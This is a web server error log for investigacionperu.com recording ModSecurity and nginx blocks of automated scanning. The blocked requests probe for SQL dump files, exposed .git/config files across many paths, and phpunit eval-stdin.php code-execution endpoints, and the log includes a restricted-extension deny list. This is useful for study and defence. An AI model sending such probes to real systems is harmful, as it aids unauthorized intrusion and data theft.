18:41:01.020406 2023] [:error] [pid 30225:tid 140228266260224] [client 76.95.207.43:39120] [client 76.95.207.43] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysql.sql"] [unique_id "ZCIpjSmSIAY2KUMNqz-3nAAAAMw"] [Mon Mar 27 22:18:53.773949 2023] [:error] [pid 30225:tid 140228333401856] [client 88.136.223.211:54368] [client 88.136.223.211] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1.sql"] [unique_id "ZCJcnSmSIAY2KUMNqz-91wAAAMQ"] [Tue Mar 28 02:01:00.675908 2023] [:error] [pid 30225:tid 140228207511296] [client 2.229.111.157:40990] [client 2.229.111.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1.sql"] [unique_id "ZCKQrCmSIAY2KUMNqz_DnwAAANM"] [Tue Mar 28 03:20:17.912915 2023] [ssl:warn] [pid 24435:tid 140666076694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 28 03:20:18.067725 2023] [ssl:warn] [pid 24436:tid 140666076694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 28 03:20:18.571342 2023] [ssl:warn] [pid 24436:tid 140666076694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 28 03:20:20.112913 2023] [ssl:warn] [pid 24436:tid 140666076694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 28 03:20:22.389313 2023] [ssl:warn] [pid 24854:tid 140515047348096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 28 03:20:22.504346 2023] [ssl:warn] [pid 24855:tid 140515047348096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 28 05:38:11.456709 2023] [:error] [pid 25183:tid 140514720462592] [client 116.212.208.178:55720] [client 116.212.208.178] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/www.sql"] [unique_id "ZCLDk9Tb683GUixQN6w0nAAAAMk"] [Tue Mar 28 09:20:57.987416 2023] [:error] [pid 25183:tid 140514628142848] [client 188.15.138.217:46736] [client 188.15.138.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/www.sql"] [unique_id "ZCL3ydTb683GUixQN6w-mAAAANQ"] [Tue Mar 28 12:06:26.943224 2023] [autoindex:error] [pid 24873:tid 140514611357440] [client 20.85.233.201:56752] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 28 20:33:20.514962 2023] [autoindex:error] [pid 25183:tid 140514833155840] [client 20.97.249.40:55430] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 29 03:28:17.985664 2023] [ssl:warn] [pid 31240:tid 140549756245888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 03:28:18.109278 2023] [ssl:warn] [pid 31241:tid 140549756245888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 03:28:18.472680 2023] [ssl:warn] [pid 31241:tid 140549756245888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 03:28:19.954541 2023] [ssl:warn] [pid 31241:tid 140549756245888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 03:28:22.243134 2023] [ssl:warn] [pid 31685:tid 140700203452288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 03:28:22.351310 2023] [ssl:warn] [pid 31686:tid 140700203452288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 05:52:14.311778 2023] [autoindex:error] [pid 31980:tid 140699989260032] [client 49.51.195.144:52536] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 29 06:30:57.159379 2023] [autoindex:error] [pid 31980:tid 140699857032960] [client 20.117.129.228:54156] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 29 08:46:40.411563 2023] [ssl:warn] [pid 31686:tid 140700203452288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 08:46:41.112324 2023] [ssl:warn] [pid 31686:tid 140700203452288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 08:47:19.676627 2023] [ssl:warn] [pid 31686:tid 140700203452288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 29 08:47:20.215819 2023] [ssl:warn] [pid 31686:tid 140700203452288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 30 03:16:19.538215 2023] [ssl:warn] [pid 8464:tid 140482648147840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 30 03:16:19.663858 2023] [ssl:warn] [pid 8465:tid 140482648147840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 30 03:16:20.103228 2023] [ssl:warn] [pid 8465:tid 140482648147840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 30 03:16:22.177660 2023] [ssl:warn] [pid 8465:tid 140482648147840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 30 03:16:24.475548 2023] [ssl:warn] [pid 8911:tid 140296244668288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 30 03:16:24.600699 2023] [ssl:warn] [pid 8912:tid 140296244668288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/03/30 06:20:34 [error] 8804#8804: *556359 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/admin/v4/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556360 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/admin/v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556361 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /__MACOSX/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556362 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556365 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/admin/v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556363 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556364 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /alpha/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556366 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /backup/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556367 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/user/v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556368 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /application/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556369 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556370 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /beta/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556371 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556373 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /build/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556372 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /blog/wp-content/themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556374 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /a/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556375 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556376 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /common/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556377 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556378 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556379 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /demo/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556380 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556382 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /developer/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556381 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556385 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556387 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /live/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556383 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /flock/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556386 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556384 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /gateway/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556388 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /m/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556389 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /new/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556390 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /old-cuburn/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556391 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556392 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /qa/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556395 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556394 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /repository/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556393 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /repos/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556399 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/user/v4/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556396 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/admin/v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556397 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /samples/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556398 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/v4/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556400 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /amphtml/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556401 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/user/v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556402 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556403 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556404 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /store/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556405 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556408 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /staging/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556406 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /static/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556409 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556407 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /shop/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556410 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556411 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556412 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556413 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556414 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556416 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556415 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556417 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /wp-includes/js/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556418 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /user/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556419 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556420 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8805#8805: *556421 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /api/user/v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/30 06:20:34 [error] 8804#8804: *556422 access forbidden by rule, client: 3.15.201.24, server: mail.investigacionperu.com, request: "GET /aomanalyzer/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Mar 30 06:33:34.524110 2023] [autoindex:error] [pid 9378:tid 140295945565952] [client 43.134.46.76:45238] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 30 12:05:00.891415 2023] [:error] [pid 8936:tid 140295870031616] [client 5.161.102.105:38244] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPNT1kWaQLjv80FSO_gAAAI8"] [Thu Mar 30 12:05:00.915917 2023] [:error] [pid 8934:tid 140296064046848] [client 5.161.102.105:38246] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPPga235zLtbfUvz-WwAAAAA"] [Thu Mar 30 12:05:00.940127 2023] [:error] [pid 9378:tid 140295836460800] [client 5.161.102.105:38248] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/system/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPAXNvnD7WSFYwghj0gAAANM"] [Thu Mar 30 12:05:00.966529 2023] [:error] [pid 9378:tid 140295853246208] [client 5.161.102.105:38250] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPAXNvnD7WSFYwghj0wAAANE"] [Thu Mar 30 12:05:01.000828 2023] [:error] [pid 9378:tid 140295802889984] [client 5.161.102.105:38252] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj1AAAANc"] [Thu Mar 30 12:05:01.024510 2023] [:error] [pid 9378:tid 140295886817024] [client 5.161.102.105:38254] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id 